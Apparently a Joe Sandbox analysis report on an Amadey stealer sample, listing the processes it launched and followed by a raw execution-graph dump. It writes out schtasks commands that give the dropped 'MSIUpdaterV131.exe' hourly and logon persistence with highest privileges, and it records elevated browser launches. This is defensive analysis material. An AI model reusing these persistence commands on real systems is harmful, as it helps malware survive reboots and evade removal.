                                                                                                                                                                                  Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                  Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com
                                                                                                                                                                                  Imagebase:0x7ff684c40000
                                                                                                                                                                                  File size:3'242'272 bytes
                                                                                                                                                                                  MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  Target ID:26
                                                                                                                                                                                  Start time:12:29:24
                                                                                                                                                                                  Start date:21/02/2024
                                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2212 --field-trial-handle=2160,i,16389860597425483203,2440417180069271130,262144 /prefetch:3
                                                                                                                                                                                  Imagebase:0x7ff715da0000
                                                                                                                                                                                  File size:4'210'216 bytes
                                                                                                                                                                                  MD5 hash:BF154738460E4AB1D388970E1AB13FAB
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  Target ID:27
                                                                                                                                                                                  Start time:12:29:24
                                                                                                                                                                                  Start date:21/02/2024
                                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2100 --field-trial-handle=2044,i,14961278424366734041,2160420270144941880,262144 /prefetch:3
                                                                                                                                                                                  Imagebase:0x7ff715da0000
                                                                                                                                                                                  File size:4'210'216 bytes
                                                                                                                                                                                  MD5 hash:BF154738460E4AB1D388970E1AB13FAB
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  Target ID:28
                                                                                                                                                                                  Start time:12:29:24
                                                                                                                                                                                  Start date:21/02/2024
                                                                                                                                                                                  Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                  Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.facebook.com/video
                                                                                                                                                                                  Imagebase:0x7ff684c40000
                                                                                                                                                                                  File size:3'242'272 bytes
                                                                                                                                                                                  MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  Target ID:29
                                                                                                                                                                                  Start time:12:29:24
                                                                                                                                                                                  Start date:21/02/2024
                                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate https://www.youtube.com
                                                                                                                                                                                  Imagebase:0x7ff715da0000
                                                                                                                                                                                  File size:4'210'216 bytes
                                                                                                                                                                                  MD5 hash:BF154738460E4AB1D388970E1AB13FAB
                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  Target ID:30
                                                                                                                                                                                  Start time:12:29:24
                                                                                                                                                                                  Start date:21/02/2024
                                                                                                                                                                                  Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                  Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" https://accounts.google.com
                                                                                                                                                                                  Imagebase:0x7ff684c40000
                                                                                                                                                                                  File size:3'242'272 bytes
                                                                                                                                                                                  MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  Target ID:31
                                                                                                                                                                                  Start time:12:29:24
                                                                                                                                                                                  Start date:21/02/2024
                                                                                                                                                                                  Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                  Commandline:"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com
                                                                                                                                                                                  Imagebase:0x7ff728280000
                                                                                                                                                                                  File size:676'768 bytes
                                                                                                                                                                                  MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  Target ID:32
                                                                                                                                                                                  Start time:12:29:24
                                                                                                                                                                                  Start date:21/02/2024
                                                                                                                                                                                  Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                  Commandline:"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.facebook.com/video
                                                                                                                                                                                  Imagebase:0x7ff728280000
                                                                                                                                                                                  File size:676'768 bytes
                                                                                                                                                                                  MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  Target ID:33
                                                                                                                                                                                  Start time:12:29:25
                                                                                                                                                                                  Start date:21/02/2024
                                                                                                                                                                                  Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                  Commandline:"C:\Program Files\Mozilla Firefox\firefox.exe" https://accounts.google.com
                                                                                                                                                                                  Imagebase:0x7ff728280000
                                                                                                                                                                                  File size:676'768 bytes
                                                                                                                                                                                  MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  Target ID:34
                                                                                                                                                                                  Start time:12:29:25
                                                                                                                                                                                  Start date:21/02/2024
                                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2892 --field-trial-handle=2488,i,12328680280612180646,18333747278986842312,262144 /prefetch:3
                                                                                                                                                                                  Imagebase:0x7ff715da0000
                                                                                                                                                                                  File size:4'210'216 bytes
                                                                                                                                                                                  MD5 hash:BF154738460E4AB1D388970E1AB13FAB
                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  Target ID:35
                                                                                                                                                                                  Start time:12:29:25
                                                                                                                                                                                  Start date:21/02/2024
                                                                                                                                                                                  Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                  Commandline:"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com --attempting-deelevation
                                                                                                                                                                                  Imagebase:0x7ff728280000
                                                                                                                                                                                  File size:676'768 bytes
                                                                                                                                                                                  MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  Target ID:36
                                                                                                                                                                                  Start time:12:29:27
                                                                                                                                                                                  Start date:21/02/2024
                                                                                                                                                                                  Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                  Commandline:"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com
                                                                                                                                                                                  Imagebase:0x7ff728280000
                                                                                                                                                                                  File size:676'768 bytes
                                                                                                                                                                                  MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  Target ID:37
                                                                                                                                                                                  Start time:12:29:27
                                                                                                                                                                                  Start date:21/02/2024
                                                                                                                                                                                  Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                  Commandline:"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.facebook.com/video --attempting-deelevation
                                                                                                                                                                                  Imagebase:0x7ff728280000
                                                                                                                                                                                  File size:676'768 bytes
                                                                                                                                                                                  MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  Target ID:39
                                                                                                                                                                                  Start time:12:29:27
                                                                                                                                                                                  Start date:21/02/2024
                                                                                                                                                                                  Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                  Commandline:"C:\Program Files\Mozilla Firefox\firefox.exe" https://accounts.google.com --attempting-deelevation
                                                                                                                                                                                  Imagebase:0x7ff728280000
                                                                                                                                                                                  File size:676'768 bytes
                                                                                                                                                                                  MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  Target ID:40
                                                                                                                                                                                  Start time:12:29:27
                                                                                                                                                                                  Start date:21/02/2024
                                                                                                                                                                                  Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                  Commandline:"C:\Program Files\Mozilla Firefox\firefox.exe" https://accounts.google.com
                                                                                                                                                                                  Imagebase:0x7ff728280000
                                                                                                                                                                                  File size:676'768 bytes
                                                                                                                                                                                  MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  Target ID:41
                                                                                                                                                                                  Start time:12:29:28
                                                                                                                                                                                  Start date:21/02/2024
                                                                                                                                                                                  Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                  Commandline:schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exe" /tn "MSIUpdaterV131 HR" /sc HOURLY /rl HIGHEST
                                                                                                                                                                                  Imagebase:0xf00000
                                                                                                                                                                                  File size:187'904 bytes
                                                                                                                                                                                  MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  Target ID:42
                                                                                                                                                                                  Start time:12:29:28
                                                                                                                                                                                  Start date:21/02/2024
                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                  Imagebase:0x7ff66e660000
                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  Target ID:44
                                                                                                                                                                                  Start time:12:29:31
                                                                                                                                                                                  Start date:21/02/2024
                                                                                                                                                                                  Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                  Commandline:schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exe" /tn "MSIUpdaterV131 LG" /sc ONLOGON /rl HIGHEST
                                                                                                                                                                                  Imagebase:0xf00000
                                                                                                                                                                                  File size:187'904 bytes
                                                                                                                                                                                  MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  Target ID:45
                                                                                                                                                                                  Start time:12:29:31
                                                                                                                                                                                  Start date:21/02/2024
                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                  Imagebase:0x7ff66e660000
                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  Target ID:46
                                                                                                                                                                                  Start time:12:29:32
                                                                                                                                                                                  Start date:21/02/2024
                                                                                                                                                                                  Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                  Commandline:"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2268 -parentBuildID 20230927232528 -prefsHandle 2212 -prefMapHandle 2196 -prefsLen 25250 -prefMapSize 238690 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2dec1c63-b17a-4876-842e-08a38d7ca489} 7068 "\\.\pipe\gecko-crash-server-pipe.7068" 15443b69710 socket
                                                                                                                                                                                  Imagebase:0x7ff728280000
                                                                                                                                                                                  File size:676'768 bytes
                                                                                                                                                                                  MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  Target ID:47
                                                                                                                                                                                  Start time:12:29:32
                                                                                                                                                                                  Start date:21/02/2024
                                                                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\idPXKSo93Tb9SEEu9e8w.exe
                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\idPXKSo93Tb9SEEu9e8w.exe"
                                                                                                                                                                                  Imagebase:0xe80000
                                                                                                                                                                                  File size:1'882'112 bytes
                                                                                                                                                                                  MD5 hash:2C4C8C25D448625A0184403CA56EDB2D
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 0000002F.00000003.2504348053.0000000004E70000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 0000002F.00000002.2988504929.0000000000E81000.00000040.00000001.01000000.00000010.sdmp, Author: Joe Security
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  Target ID:48
                                                                                                                                                                                  Start time:12:29:34
                                                                                                                                                                                  Start date:21/02/2024
                                                                                                                                                                                  Path:C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exe
                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                  Commandline:C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exe
                                                                                                                                                                                  Imagebase:0xef0000
                                                                                                                                                                                  File size:1'882'112 bytes
                                                                                                                                                                                  MD5 hash:2C4C8C25D448625A0184403CA56EDB2D
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000030.00000003.2671707007.0000000005330000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000030.00000002.2726513631.0000000000EF1000.00000040.00000001.01000000.00000011.sdmp, Author: Joe Security
                                                                                                                                                                                  Antivirus matches:
                                                                                                                                                                                  • Detection: 100%, Avira
                                                                                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  Target ID:51
                                                                                                                                                                                  Start time:12:29:35
                                                                                                                                                                                  Start date:21/02/2024
                                                                                                                                                                                  Path:C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exe
                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                  Commandline:C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exe
                                                                                                                                                                                  Imagebase:0xef0000
                                                                                                                                                                                  File size:1'882'112 bytes
                                                                                                                                                                                  MD5 hash:2C4C8C25D448625A0184403CA56EDB2D
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000033.00000003.2673856805.0000000004EE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000033.00000002.2815292742.0000000000EF1000.00000040.00000001.01000000.00000011.sdmp, Author: Joe Security
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  Target ID:52
                                                                                                                                                                                  Start time:12:29:35
                                                                                                                                                                                  Start date:21/02/2024
                                                                                                                                                                                  Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                  Commandline:"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3352 -childID 1 -isForBrowser -prefsHandle 3476 -prefMapHandle 3456 -prefsLen 21837 -prefMapSize 238690 -jsInitHandle 1224 -jsInitLen 234236 -parentBuildID 20230927232528 -appDir "C:\Program Files\Mozilla Firefox\browser" - {03d6e9a6-1e50-44a7-bf2d-b228302d3bed} 7068 "\\.\pipe\gecko-crash-server-pipe.7068" 154542c5bd0 tab
                                                                                                                                                                                  Imagebase:0x7ff728280000
                                                                                                                                                                                  File size:676'768 bytes
                                                                                                                                                                                  MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  Target ID:53
                                                                                                                                                                                  Start time:12:29:35
                                                                                                                                                                                  Start date:21/02/2024
                                                                                                                                                                                  Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                  Commandline:"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3612 -childID 2 -isForBrowser -prefsHandle 3648 -prefMapHandle 3644 -prefsLen 22027 -prefMapSize 238690 -jsInitHandle 1224 -jsInitLen 234236 -parentBuildID 20230927232528 -appDir "C:\Program Files\Mozilla Firefox\browser" - {c15219fb-e510-488d-91c4-9069f57fa56f} 7068 "\\.\pipe\gecko-crash-server-pipe.7068" 1544ff41d90 tab
                                                                                                                                                                                  Imagebase:0x7ff728280000
                                                                                                                                                                                  File size:676'768 bytes
                                                                                                                                                                                  MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  Target ID:54
                                                                                                                                                                                  Start time:12:29:36
                                                                                                                                                                                  Start date:21/02/2024
                                                                                                                                                                                  Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                  Commandline:"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3648 -childID 3 -isForBrowser -prefsHandle 2584 -prefMapHandle 4128 -prefsLen 22068 -prefMapSize 238690 -jsInitHandle 1224 -jsInitLen 234236 -parentBuildID 20230927232528 -appDir "C:\Program Files\Mozilla Firefox\browser" - {25243739-fa95-4db8-bf39-e38de4f4d55a} 7068 "\\.\pipe\gecko-crash-server-pipe.7068" 154576c6a10 tab
                                                                                                                                                                                  Imagebase:0x7ff728280000
                                                                                                                                                                                  File size:676'768 bytes
                                                                                                                                                                                  MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false


                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                    Execution Coverage:14.6%
                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:3.7%
                                                                                                                                                                                    Signature Coverage:64.7%
                                                                                                                                                                                    Total number of Nodes:2000
                                                                                                                                                                                    Total number of Limit Nodes:156
__fread_nolock 69954->69955 69955->69955 69956 62a32 69955->69956 69958 9d850 4 API calls 69955->69958 69957 32040 4 API calls 69956->69957 69989 61181 69957->69989 69959 610ff 69958->69959 69961 61136 69959->69961 69962 615ba 69959->69962 69960 112350 3 API calls 69964 62a3c 69960->69964 69965 95e10 4 API calls 69961->69965 69963 a2a00 4 API calls 69962->69963 69973 615b5 69963->69973 69967 32040 4 API calls 69964->69967 69966 61147 69965->69966 69968 50780 15 API calls 69966->69968 69969 62a41 69967->69969 69971 61153 69968->69971 69970 112350 3 API calls 69969->69970 69972 62a46 69970->69972 69974 61179 69971->69974 70015 61238 69971->70015 72406 993d0 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 69972->72406 69979 a2a00 4 API calls 69973->69979 69981 61674 69973->69981 69973->69989 69976 98000 5 API calls 69974->69976 69976->69989 69977 615a9 69980 98000 5 API calls 69977->69980 69979->69981 69980->69973 69981->69964 69981->69981 69987 9d850 4 API calls 69981->69987 69981->69989 69984 61233 69984->69543 69986 9d850 4 API calls 69986->70015 69990 617a7 69987->69990 69989->69960 69989->69984 69992 3b8e0 9 API calls 69990->69992 69991 95b90 4 API calls 69991->70015 69994 617bb 69992->69994 69998 9a250 5 API calls 69994->69998 70039 61970 69994->70039 69996 50780 15 API calls 69996->70015 69999 61816 69998->69999 70006 99ec0 4 API calls 69999->70006 70002 98000 5 API calls 70002->69989 70003 98000 5 API calls 70003->70015 70004 6290a 70004->69989 70004->70002 70009 61854 70006->70009 70008 9d850 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 70008->70039 70010 99ec0 4 API calls 70009->70010 70009->70039 70011 61894 70010->70011 70016 99ec0 4 API calls 70011->70016 70012 95e10 4 API calls 70012->70015 70014 3b8e0 9 API calls 70014->70039 70015->69956 70015->69977 70015->69986 70015->69989 70015->69991 70015->69996 70015->70003 70015->70012 72398 a2b20 4 API calls 3 library calls 70015->72398 70017 618d4 70016->70017 70018 99ec0 4 API calls 
70017->70018 70017->70039 70020 61914 70018->70020 70019 9a250 5 API calls 70019->70039 70026 9d660 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 70026->70039 70027 95b20 4 API calls 70027->70039 70029 99ec0 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 70029->70039 70030 50780 15 API calls 70030->70039 70031 98000 5 API calls 70031->70039 70034 32830 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 70034->70039 70037 95e10 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 70037->70039 70039->69956 70039->69969 70039->69972 70039->69989 70039->70004 70039->70008 70039->70014 70039->70019 70039->70026 70039->70027 70039->70029 70039->70030 70039->70031 70039->70034 70039->70037 72274 60890 70039->72274 72401 9a000 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap Concurrency::cancel_current_task 70039->72401 72402 32540 5 API calls std::_Locinfo::_Locinfo_ctor 70039->72402 72403 959f0 4 API calls 3 library calls 70039->72403 72404 a1b00 16 API calls 70039->72404 72405 92640 16 API calls 70039->72405 70041 93c80 4 API calls 70040->70041 70042 703ac 70041->70042 70043 93c50 4 API calls 70042->70043 70044 703df 70043->70044 70045 99ec0 4 API calls 70044->70045 70068 70407 __fread_nolock 70045->70068 70046 7044c RegOpenKeyExA 70046->70068 70047 711de 70071 99ec0 70047->70071 70048 95c30 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 70048->70068 70049 4ffc0 5 API calls 70049->70068 70050 711f7 70052 32700 4 API calls 70050->70052 70051 97810 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 70051->70068 70053 7120e 70052->70053 70054 99c70 4 API calls 70053->70054 70055 71223 70054->70055 70056 38920 4 API calls 70055->70056 70057 7123b Concurrency::cancel_current_task 70056->70057 70058 112350 3 API calls 70057->70058 70059 71254 70058->70059 70060 95e10 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 70060->70068 70061 10ce31 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap std::_Facet_Register 
70061->70068 70062 32830 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 70062->70068 70063 9cfd0 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap 70063->70068 70064 99ec0 4 API calls 70064->70068 70067 32660 ExitProcess RtlAllocateHeap RtlFreeHeap 70067->70068 70068->70046 70068->70047 70068->70048 70068->70049 70068->70050 70068->70051 70068->70057 70068->70060 70068->70061 70068->70062 70068->70063 70068->70064 70068->70067 72853 93230 RtlAllocateHeap ExitProcess RtlAllocateHeap RtlFreeHeap Concurrency::cancel_current_task 70068->72853 72854 327b0 ExitProcess RtlAllocateHeap RtlFreeHeap 70068->72854 70069->69543 70070->69543 70072 99ef8 70071->70072 70073 99f05 70071->70073 70074 97810 4 API calls 70072->70074 70075 99f1a 70073->70075 70076 99fae 70073->70076 70074->70073 70078 32830 4 API calls 70075->70078 70077 32700 4 API calls 70076->70077 70079 99fbe 70077->70079 70080 99f53 70078->70080 70081 99c70 4 API calls 70079->70081 70082 9cfd0 4 API calls 70080->70082 70083 99fd3 70081->70083 70084 99f65 Concurrency::cancel_current_task 70082->70084 70085 38920 4 API calls 70083->70085 70086 99f8d 70084->70086 70087 112350 3 API calls 70084->70087 70085->70084 70086->69526 70088 99ffe 70087->70088 70090 9394f 70089->70090 70117 939b3 std::_Locinfo::_Locinfo_ctor 70089->70117 70091 93a0f 70090->70091 70092 93b35 70090->70092 70093 93956 70090->70093 70094 93ac6 70090->70094 70090->70117 70097 10ce31 std::_Facet_Register 4 API calls 70091->70097 70095 10ce31 std::_Facet_Register 4 API calls 70092->70095 70098 10ce31 std::_Facet_Register 4 API calls 70093->70098 70096 10ce31 std::_Facet_Register 4 API calls 70094->70096 70117->69528 70127 97973 70126->70127 70128 97852 70126->70128 70137 32700 4 API calls 70127->70137 70145 5478a 70127->70145 70129 97859 70128->70129 70130 978b5 70128->70130 70131 978d7 70128->70131 70132 97917 70128->70132 70128->70145 70433 10ce31 70129->70433 70136 10ce31 std::_Facet_Register 4 API calls 70130->70136 70133 10ce31 
